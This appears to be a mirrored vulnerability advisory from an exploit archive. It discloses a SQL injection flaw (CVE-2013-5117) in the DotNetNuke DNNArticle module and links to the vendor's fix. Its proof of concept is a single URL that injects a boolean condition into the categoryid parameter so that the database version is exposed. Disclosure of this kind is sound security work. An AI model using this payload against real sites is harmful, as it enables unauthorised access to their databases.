Skip to content
cyberexploits
webappphptext

DotNetNuke DNNArticle Module 10.0 - SQL Injection

DotNetNuke DNNArticle Module 10.0 - SQL Injection

Publié le 2013-08-15

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/27602.txt7eac4c3a
raw
Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability

References: CVE-2013-5117

Discovered by: Sajjad Pourali



Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/‎

Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)

Vendor contact: 2013-8-14



Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)

 

Remote: yes

Authentication required: no

User interaction required: no

Impact: High

 

Affected:



 - DNNArticle 10.0 and earlier



---



PoC:



http://server/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version

 

---

 

 + Sajjad Pourali

 + http://www.securation.com/

 + http://www.cert.um.ac.ir/

 + Contact: sajjad[at]securation.com

Voir sur GitHub